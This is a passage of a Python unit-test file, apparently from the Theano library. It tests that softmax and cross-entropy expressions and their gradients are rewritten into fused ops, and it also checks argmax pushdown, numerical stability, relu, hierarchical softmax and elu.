has_cx1hotdx = False
has_softmax = False
has_softmaxdx = False
for node in fgraph.toposort():
if node.op == crossentropy_softmax_argmax_1hot_with_bias:
has_cx1hot = True
if node.op == crossentropy_softmax_1hot_with_bias_dx:
has_cx1hotdx = True
if node.op == softmax_op:
has_softmax = True
if node.op == softmax_grad:
has_softmaxdx = True
assert not has_cx1hot
assert has_cx1hotdx
assert has_softmax
assert not has_softmaxdx
def test_softmax_grad_optimizations_vector(self):
x = tensor.vector('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(softmax_op(x), one_of_n)
sum_xe = tensor.sum(xe)
g_x = tensor.grad(sum_xe, x)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[g_x])
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op, node.inputs
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op, node.inputs
has_cx1hot = False
has_cx1hotdx = False
has_softmax = False
has_softmaxdx = False
for node in fgraph.toposort():
if node.op == crossentropy_softmax_argmax_1hot_with_bias:
has_cx1hot = True
if node.op == crossentropy_softmax_1hot_with_bias_dx:
has_cx1hotdx = True
if node.op == softmax_op:
has_softmax = True
if node.op == softmax_grad:
has_softmaxdx = True
assert not has_cx1hot
assert has_cx1hotdx
assert has_softmax
assert not has_softmaxdx
def test_get_rid_of_advanced_indexing_version_of_xent(self):
verbose = 0
# TODO: add the optimization in FAST_COMPILE?
# In the mean time, run it as 'FAST_RUN' instead
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(3, 5).astype(config.floatX)
b_val = rng.randn(5).astype(config.floatX)
y_val = numpy.asarray([2, 4, 1])
x = T.matrix('x')
b = T.vector('b')
y = T.lvector('y')
# Basic case
expressions = [
T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
T.sum(-T.log(softmax(x))[T.arange(y.shape[0]), y])
]
for expr in expressions:
# Verify the optimizer worked on the expressions
f = theano.function([x, y], expr, mode=mode)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 4
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
# Also verify the gradient wrt x
g = theano.function([x, y], T.grad(expr, x), mode=mode)
self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 2
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_op in ops
assert softmax_grad not in ops
g(x_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
# Test that a biased softmax is optimized correctly
bias_expressions = [
T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
for expr in bias_expressions:
f = theano.function([x, b, y], expr, mode=mode)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 2 # [big_op, sum]
assert crossentropy_softmax_argmax_1hot_with_bias in ops
f(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 2
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_with_bias in ops
assert softmax_grad not in ops
g(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
# Test that using "mean" instead of sum works, too
mean_expressions = [
T.mean(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
-T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
-T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
T.mean(-T.log(softmax(x))[T.arange(y.shape[0]), y])]
for expr in mean_expressions:
f = theano.function([x, y], expr, mode=mode)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 6
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
g = theano.function([x, y], T.grad(expr, x), mode=mode)
self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 5
#there's an extra dimshuffle in there
# but I can't think of a good rule to get rid of it
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_op in ops
assert softmax_grad not in ops
g(x_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
mean_bias_expressions = [
T.mean(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
-T.mean(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
-T.mean(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
T.mean(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
for expr in mean_bias_expressions:
f = theano.function([x, b, y], expr, mode=mode)
self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 4
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
except Exception:
theano.printing.debugprint(f)
raise
g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
if verbose:
theano.printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 5
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_with_bias in ops
assert softmax_grad not in ops
g(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_xent_thing_int32(self):
verbose = 0
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(3, 5).astype(config.floatX)
y_val = numpy.asarray([2, 4, 1], dtype='int64')
x = T.matrix('x')
y = T.lvector('y')
yi = T.cast(y, 'int32')
expressions = [
T.sum(-T.log(softmax(x)[T.arange(yi.shape[0]), yi])),
-T.sum(T.log(softmax(x)[T.arange(yi.shape[0]), yi])),
-T.sum(T.log(softmax(x))[T.arange(yi.shape[0]), yi]),
T.sum(-T.log(softmax(x))[T.arange(yi.shape[0]), yi])
]
for expr in expressions:
# Verify the optimizer worked on the expressions
f = theano.function([x, y], expr, mode=mode)
if verbose:
theano.printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 5
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
# Also verify the gradient wrt x
g = theano.function([x, y], T.grad(expr, x), mode=mode)
if verbose:
theano.printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 3
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_op in ops
assert softmax_grad not in ops
g(x_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_optimize_xent_vector(self):
verbose = 0
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(5).astype(config.floatX)
y_val = numpy.asarray([2])
x = T.vector('x')
y = T.lvector('y')
# Test that a biased softmax is optimized correctly
bias_expressions = [
T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y]))]
for expr in bias_expressions:
f = theano.function([x, y], expr, mode=mode)
if verbose:
printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
assert len(ops) == 5
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
g = theano.function([x, y], T.grad(expr, x), mode=mode)
if verbose:
printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) == 4
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_op in ops
assert softmax_grad not in ops
g(x_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_optimize_xent_vector2(self):
verbose = 0
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(5).astype(config.floatX)
b_val = rng.randn(5).astype(config.floatX)
y_val = numpy.asarray([2])
x = T.vector('x')
b = T.vector('b')
y = T.lvector('y')
# Test that a biased softmax is optimized correctly
bias_expressions = [
T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
for expr in bias_expressions:
f = theano.function([x, b, y], expr, mode=mode)
if verbose:
printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
# [big_op, sum, dim_shuffle]
assert len(ops) == 3
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
finally:
config.warn.sum_div_dimshuffle_bug = backup
if verbose:
printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) <= 6
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_with_bias in ops
assert softmax_grad not in ops
g(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_optimize_xent_vector3(self):
# Same as test_optimize_xent_vector2, but y is the result of
# a "flatten", and it used to make the constant-folding
# of arange(y.shape[0]) happen before the xent optimization
verbose = 0
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(5).astype(config.floatX)
b_val = rng.randn(5).astype(config.floatX)
y_val = numpy.asarray([2])
x = T.vector('x')
b = T.vector('b')
y_ = T.lvector('y_')
y = y_.flatten()
# Test that a biased softmax is optimized correctly
bias_expressions = [
T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
for expr in bias_expressions:
f = theano.function([x, b, y_], expr, mode=mode)
if verbose:
printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
# [big_op, sum, dim_shuffle, flatten]
assert len(ops) <= 4
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
finally:
config.warn.sum_div_dimshuffle_bug = backup
if verbose:
printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) <= 6
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_with_bias in ops
assert softmax_grad not in ops
g(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_optimize_xent_vector4(self):
# Same as test_optimize_xent_vector2, but y is the result of
# a "specify_shape" that indicates its length is 1, so the
# constant-folding of arange(y.shape[0]) happen before the xent
# optimization
verbose = 0
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(5).astype(config.floatX)
b_val = rng.randn(5).astype(config.floatX)
y_val = numpy.asarray([2])
x = T.vector('x')
b = T.vector('b')
y_ = T.lvector('y_')
y = T.specify_shape(y_, (1,))
# Test that a biased softmax is optimized correctly
bias_expressions = [
T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
-T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
for expr in bias_expressions:
f = theano.function([x, b, y_], expr, mode=mode)
if verbose:
printing.debugprint(f)
try:
ops = [node.op for node in f.maker.fgraph.toposort()]
# [big_op, sum, dim_shuffle, specify_shape]
assert len(ops) <= 4
assert crossentropy_softmax_argmax_1hot_with_bias in ops
assert not [1 for o in ops
if isinstance(o, T.AdvancedSubtensor)]
f(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(f)
raise
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
finally:
config.warn.sum_div_dimshuffle_bug = backup
if verbose:
printing.debugprint(g)
try:
ops = [node.op for node in g.maker.fgraph.toposort()]
assert len(ops) <= 6
assert crossentropy_softmax_1hot_with_bias_dx in ops
assert softmax_with_bias in ops
assert softmax_grad not in ops
g(x_val, b_val, y_val)
except Exception:
theano.printing.debugprint(g)
raise
def test_crossentropy_softmax_1hot_with_bias_dxcale_cost(self):
# TODO: add the optimization in FAST_COMPILE?
# In the mean time, run it as 'FAST_RUN' instead
mode = theano.compile.mode.get_default_mode()
if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
mode = 'FAST_RUN'
rng = numpy.random.RandomState(utt.fetch_seed())
x_val = rng.randn(3, 5).astype(config.floatX)
y_val = numpy.asarray([2, 4, 1])
x = T.matrix('x')
y = T.lvector('y')
a = T.scalar('a')
def validate_fn_graph(func):
# The graph of the function should not have softmax anymore
has_cx1hot = False
has_softmax = False
for node in func.maker.fgraph.toposort():
if node.op == crossentropy_softmax_argmax_1hot_with_bias:
has_cx1hot = True
if node.op == softmax_op:
has_softmax = True
assert has_cx1hot
assert not has_softmax
def validate_grad_graph(func):
# The graph of the gradient should not have softmaxgrad anymore
has_cx1hotdx = False
has_softmax = False
has_softmaxdx = False
for node in func.maker.fgraph.toposort():
if node.op == crossentropy_softmax_1hot_with_bias_dx:
has_cx1hotdx = True
if node.op == softmax_op:
has_softmax = True
if node.op == softmax_grad:
has_softmaxdx = True
assert has_cx1hotdx
assert has_softmax
assert not has_softmaxdx
# Cases to test
expressions = [
a * T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
-a * T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
a * (-T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y]))),
a * T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
a * T.sum(-T.log(softmax(x))[T.arange(y.shape[0]), y]),
-a * T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
a * (-T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y])),
a * T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
a * T.mean(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
-a * T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
a * (-T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y]))),
a * T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
a * T.mean(-T.log(softmax(x))[T.arange(y.shape[0]), y]),
-a * T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
a * (-T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y])),
a * T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
]
for expr in expressions:
# Verify the optimizer worked on the expressions
f = theano.function([x, y, a], expr, mode=mode)
try:
assert 5 <= len(f.maker.fgraph.toposort()) <= 10
validate_fn_graph(f)
f(x_val, y_val, 0.1)
except Exception:
theano.printing.debugprint(f)
raise
# Verify the gradient wrt x
g = theano.function([x, y, a], T.grad(expr, x), mode=mode)
try:
assert 3 <= len(g.maker.fgraph.toposort()) <= 6
validate_grad_graph(g)
g(x_val, y_val, 0.1)
except Exception:
theano.printing.debugprint(g)
raise
# Verify the gradient when providing output gradient
h = theano.function([x, y, a],
T.grad(expr, x, known_grads={expr: a * x.sum()}), mode=mode)
try:
assert 6 <= len(h.maker.fgraph.toposort()) <= 8
validate_grad_graph(h)
h(x_val, y_val, 0.1)
except Exception:
theano.printing.debugprint(h)
raise
def test_argmax_pushdown():
x = tensor.matrix()
for sm in [softmax_graph, softmax_op]:
# test that the max_and_argmax is pushed down if the max is not used
out = tensor.max_and_argmax(
sm(tensor.exp(tensor.tanh(sigmoid(x)))),
axis=-1)[1]
fgraph = gof.FunctionGraph(
[x],
[out])
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
assert len(fgraph.toposort()) == 2 # an output_guard is second
assert fgraph.toposort()[0].op == tensor.basic._max_and_argmax
assert str(fgraph.toposort()[1].op) == 'OutputGuard'
x = tensor.matrix()
# test that the max_and_argmax is not pushed down if the max is used
out = tensor.max_and_argmax(
sm(tensor.exp(tensor.tanh(sigmoid(x)))),
axis=-1)[0]
fgraph = gof.FunctionGraph(
[x],
[out])
assert hasattr(fgraph.outputs[0].tag, 'trace')
backup = config.warn.argmax_pushdown_bug
config.warn.argmax_pushdown_bug = False
try:
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
finally:
config.warn.argmax_pushdown_bug = backup
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
assert len(fgraph.toposort()) == 4 # an output_guard is second
assert isinstance(fgraph.toposort()[0].op, tensor.Elemwise)
assert isinstance(fgraph.toposort()[1].op, Softmax)
assert isinstance(fgraph.toposort()[2].op, tensor.CAReduce)
assert isinstance(fgraph.toposort()[2].op.scalar_op, theano.scalar.Maximum)
assert str(fgraph.toposort()[3].op) == 'OutputGuard'
def test_argmax_pushdown_bias():
x = tensor.matrix()
b = tensor.vector()
out = tensor.argmax(softmax_with_bias(x, b), axis=-1)
fgraph = gof.FunctionGraph(
[x, b],
[out])
f = theano.function([x, b], out)
assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
assert len(fgraph.toposort()) == 4
assert isinstance(fgraph.toposort()[0].op, tensor.DimShuffle)
assert isinstance(fgraph.toposort()[1].op, tensor.Elemwise)
assert isinstance(fgraph.toposort()[2].op, tensor.MaxAndArgmax)
assert str(fgraph.toposort()[3].op) == 'OutputGuard'
x = tensor.matrix()
b = tensor.vector()
out = tensor.max_and_argmax(softmax_with_bias(x, b), axis=-1)[0]
fgraph = gof.FunctionGraph(
[x, b],
[out])
f = theano.function([x, b], out)
assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
backup = config.warn.argmax_pushdown_bug
config.warn.argmax_pushdown_bug = False
try:
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
finally:
config.warn.argmax_pushdown_bug = backup
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
assert len(fgraph.toposort()) == 3
assert isinstance(fgraph.toposort()[0].op, SoftmaxWithBias)
assert isinstance(fgraph.toposort()[1].op, tensor.CAReduce)
assert isinstance(fgraph.toposort()[1].op.scalar_op, theano.scalar.Maximum)
assert str(fgraph.toposort()[2].op) == 'OutputGuard'
def test_asymptotic_32():
"""
This test makes sure that our functions behave sensibly when
huge values are present
"""
# TODO: consider adding the optimization of crossentropy into the current
# mode for the purpose of running this test
for dtype in 'float32', 'float64':
if dtype == 'float32':
x = tensor.fmatrix()
x2 = tensor.fvector()
else:
x = tensor.dmatrix()
x2 = tensor.dvector()
y = tensor.lvector()
c = categorical_crossentropy(softmax(x + x2), y)
f = theano.function([x, y, x2], [c.sum(),
tensor.grad(c.sum(), x)], mode='FAST_RUN')
if 0:
for i, n in enumerate(f.maker.fgraph.toposort()):
print(i, n)
xval = numpy.zeros((5, 5), dtype=dtype).astype(dtype)
x2val = numpy.zeros(5, dtype=xval.dtype).astype(dtype)
for i in xrange(100):
cval, gxval = f(xval, numpy.arange(5), x2val)
xval -= 100.3 * gxval
# print cval, gxval
assert cval == 0 # no problem going to zero error
# what about when x gets really big?
xval = numpy.zeros((5, 5), dtype=dtype)
x2val = numpy.zeros(5, dtype=xval.dtype)
for i in xrange(100):
cval, gxval = f(xval, numpy.arange(5), x2val)
xval += 100000.3 * gxval
# print cval, gxval
assert cval > 61750000
assert gxval[0, 0] == -1.0
assert gxval[0, 1] == 0.25
class Test_softmax_opt:
# Test that expressions of softmax in terms of exponentiated things
# divided by row sums are replaced by softmax expressions.
#
# Softmax_grad isn't that interesting as an Op, but it has the signature
# we look for when trying to insert CrossEntropySoftmax... grad. So, for
# now, we add softmax_grad to graphs. In the future, we may modify the
# CrossEntropySoftmax...grad to look for the more basic pattern.
#
def setUp(self):
utt.seed_rng()
self.rng = numpy.random.RandomState(utt.fetch_seed())
self.mode = theano.compile.mode.get_default_mode()
self.mode = self.mode.including('canonicalize')
def test_basic(self):
c = T.matrix()
p_y = T.exp(c) / T.exp(c).sum(axis=1).dimshuffle(0, 'x')
# test that function contains softmax and no div.
f = theano.function([c], p_y, mode=self.mode)
assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
f_ops = [n.op for n in f.maker.fgraph.toposort()]
# print '--- f ='
# printing.debugprint(f)
# print '==='
assert len(f_ops) == 1
assert softmax_op in f_ops
f(self.rng.rand(3, 4).astype(config.floatX))
def test_basic_keepdims(self):
c = T.matrix()
p_y = T.exp(c) / T.exp(c).sum(axis=1, keepdims=True)
# test that function contains softmax and no div.
f = theano.function([c], p_y, mode=self.mode)
assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
f_ops = [n.op for n in f.maker.fgraph.toposort()]
# print '--- f ='
# printing.debugprint(f)
# print '==='
assert len(f_ops) == 1
assert softmax_op in f_ops
f(self.rng.rand(3, 4).astype(config.floatX))
def test_grad(self):
c = T.matrix()
p_y = T.exp(c) / T.exp(c).sum(axis=1).dimshuffle(0, 'x')
# test that function contains softmax and softmaxgrad
w = T.matrix()
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([c, w], T.grad((p_y * w).sum(), c))
hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
finally:
config.warn.sum_div_dimshuffle_bug = backup
g_ops = [n.op for n in g.maker.fgraph.toposort()]
# print '--- g ='
# printing.debugprint(g)
# print '==='
raise SkipTest('Optimization not enabled for the moment')
assert len(g_ops) == 2
assert softmax_op in g_ops
assert softmax_grad in g_ops
g(self.rng.rand(3, 4), self.rng.uniform(.5, 1, (3, 4)))
def test_transpose_basic(self):
# this should be a transposed softmax
c = T.matrix()
p_y = T.exp(c) / T.exp(c).sum(axis=0)
# test that function contains softmax and no div.
f = theano.function([c], p_y)
# printing.debugprint(f)
# test that function contains softmax and no div.
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([c], T.grad(p_y.sum(), c))
hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
finally:
config.warn.sum_div_dimshuffle_bug = backup
# printing.debugprint(g)
raise SkipTest('Optimization not enabled for the moment')
def test_1d_basic(self):
# this should be a softmax, but of a one-row matrix
c = T.vector()
p_y = T.exp(c) / T.exp(c).sum()
# test that function contains softmax and no div.
f = theano.function([c], p_y)
hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
# printing.debugprint(f)
# test that function contains softmax and no div.
backup = config.warn.sum_div_dimshuffle_bug
config.warn.sum_div_dimshuffle_bug = False
try:
g = theano.function([c], T.grad(p_y.sum(), c))
hasattr(g.maker.fgraph.outputs[0].tag, 'trace')
finally:
config.warn.sum_div_dimshuffle_bug = backup
# printing.debugprint(g)
raise SkipTest('Optimization not enabled for the moment')
# REPEAT 3 CASES in presence of log(softmax) with the advanced indexing
# etc.
def test_softmax_graph():
rng = numpy.random.RandomState(utt.fetch_seed())
x = theano.shared(rng.normal(size=(3, 4)))
def f(inputs):
y = softmax_graph(x)
return theano.grad(None, x, known_grads={y: inputs})
utt.verify_grad(f, [rng.rand(3, 4)])
def test_grad_softmax_grad():
rng = numpy.random.RandomState(utt.fetch_seed())
x = theano.shared(rng.normal(size=(3, 4)))
def f(inputs):
y = softmax_op(x)
return theano.grad(None, x, known_grads={y: inputs})
utt.verify_grad(f, [rng.rand(3, 4)])
def test_stabilize_log_softmax():
mode = theano.compile.mode.get_default_mode()
mode = mode.including('local_log_softmax', 'specialize')
x = matrix()
y = softmax(x)
z = theano.tensor.log(y)
f = theano.function([x], z, mode=mode)
assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
# check that the softmax has been optimized out
for node in f.maker.fgraph.toposort():
assert not isinstance(node.op, y.owner.op.__class__)
# call the function so debug mode can verify the optimized
# version matches the unoptimized version
rng = numpy.random.RandomState([2012, 8, 22])
f(numpy.cast[config.floatX](rng.randn(2, 3)))
def test_relu():
x = matrix('x')
seed = theano.tests.unittest_tools.fetch_seed()
rng = numpy.random.RandomState(seed)
X = rng.randn(20, 30).astype(config.floatX)
# test the base case, without custom alpha value
y = relu(x).eval({x: X})
assert numpy.allclose(y, numpy.maximum(X, 0))
# test for different constant alpha values (also outside of [0, 1])
for alpha in 0, 0.3, 1, 2, -0.3, -1, -2:
y = relu(x, alpha).eval({x: X})
assert numpy.allclose(y, numpy.where(X > 0, X, alpha * X))
# test for variable alpha (scalar, vector and matrix)
for alpha in scalar(), vector(), matrix():
# create value for alpha (correct ndim and broadcastable against X)
A = numpy.array(rng.randn(*X.shape[::-1][:alpha.ndim][::-1]),
dtype=config.floatX)
y = relu(x, alpha).eval({x: X, alpha: A})
assert numpy.allclose(y, numpy.where(X > 0, X, A * X), rtol=3e-5)
def test_h_softmax():
"""
Tests the output dimensions of the h_softmax when a target is provided or
not.
"""
#############
# Config
#############
input_size = 4
batch_size = 2
h_softmax_level1_size = 5
h_softmax_level2_size = 3
output_size = h_softmax_level1_size * h_softmax_level2_size
#############
# Initialize shared variables
#############
floatX = theano.config.floatX
shared = theano.shared
# First level of h_softmax
W1 = numpy.asarray(numpy.random.normal(
size=(input_size, h_softmax_level1_size)), dtype=floatX)
W1 = shared(W1)
b1 = shared(numpy.asarray(numpy.zeros((h_softmax_level1_size,)),
dtype=floatX))
# Second level of h_softmax
W2 = numpy.asarray(numpy.random.normal(
size=(h_softmax_level1_size, input_size, h_softmax_level2_size)),
dtype=floatX)
W2 = shared(W2)
b2 = shared(
numpy.asarray(numpy.zeros((h_softmax_level1_size,
h_softmax_level2_size)), dtype=floatX))
#############
# Build graph
#############
x = tensor.matrix('x')
y = tensor.ivector('y')
# This only computes the output corresponding to the target
y_hat_tg = h_softmax(x, batch_size, output_size, h_softmax_level1_size,
h_softmax_level2_size, W1, b1, W2, b2, y)
# This computes all the outputs
y_hat_all = h_softmax(x, batch_size, output_size, h_softmax_level1_size,
h_softmax_level2_size, W1, b1, W2, b2)
#############
# Compile functions
#############
fun_output_tg = theano.function([x, y], y_hat_tg)
fun_output = theano.function([x], y_hat_all)
#############
# Test
#############
x_mat = numpy.random.normal(size=(batch_size, input_size)).astype(floatX)
y_mat = numpy.random.randint(0, output_size, batch_size).astype('int32')
tg_output = fun_output_tg(x_mat, y_mat)
all_outputs = fun_output(x_mat)
assert(tg_output.shape == (batch_size,))
assert(all_outputs.shape == (batch_size, output_size))
# Verifies that the outputs computed by fun_output_tg are the same as those
# computed by fun_output.
utt.assert_allclose(
all_outputs[numpy.arange(0, batch_size), y_mat], tg_output)
def test_elu():
x = matrix('x')
seed = theano.tests.unittest_tools.fetch_seed()
rng = numpy.random.RandomState(seed)
X = rng.randn(20, 30).astype(config.floatX)
# test the base case, without custom alpha value
y = elu(x).eval({x: X})
utt.assert_allclose(y, numpy.where(X > 0, X, numpy.exp(X) - 1))
# test for different constant alpha values
